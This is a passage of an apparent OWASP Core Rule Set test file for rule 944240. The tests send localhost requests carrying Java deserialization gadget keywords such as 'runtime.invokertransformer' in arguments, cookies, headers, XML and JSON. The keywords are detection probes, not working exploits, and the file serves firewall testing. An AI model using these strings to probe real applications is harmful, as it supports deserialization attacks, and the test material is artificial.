User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-15 + desc: "Cookie name includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.forclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-16 + desc: "Request header test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-17 + desc: "XML attribute value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-18 + desc: "XML element value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-19 + desc: "Nested XML element value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-20 + desc: "Content-Type text/plain includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-21 + desc: "Content-Type application/json arg value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.forclosure\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-22 + desc: "Content-Type application/json arg name includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.forclosure\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-23 + desc: "Argument test includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-24 + desc: "Argument name includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatefactory=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-25 + desc: "Cookie test includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-26 + desc: "Cookie name includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-27 + desc: "Request header test includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-28 + desc: "XML attribute value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-29 + desc: "XML element value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-30 + desc: "Nested XML element value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-31 + desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-32 + desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatefactory\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-33 + desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.instantiatefactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-34 + desc: "Argument test includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-35 + desc: "Argument name includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-36 + desc: "Cookie test includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-37 + desc: "Cookie name includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-38 + desc: "Request header test includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-39 + desc: "XML attribute value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-40 + desc: "XML element value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-41 + desc: "Nested XML element value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-42 + desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-43 + desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatetransformer\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-44 + desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.instantiatetransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-45 + desc: "Argument test includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-46 + desc: "Argument name includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.invokertransformer=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-47 + desc: "Cookie test includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-48 + desc: "Cookie name includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.invokertransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-49 + desc: "Request header test includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-50 + desc: "XML attribute value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-51 + desc: "XML element value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-52 + desc: "Nested XML element value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-53 + desc: "Content-Type text/plain includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-54 + desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.invokertransformer\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-55 + desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.invokertransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-56 + desc: "Argument test includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-57 + desc: "Argument name includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-58 + desc: "Cookie test includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-59 + desc: "Cookie name includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeclonefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-60 + desc: "Request header test includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-61 + desc: "XML attribute value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-62 + desc: "XML element value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-63 + desc: "Nested XML element value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-64 + desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-65 + desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeclonefactory\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-66 + desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.prototypeclonefactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-67 + desc: "Argument test includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 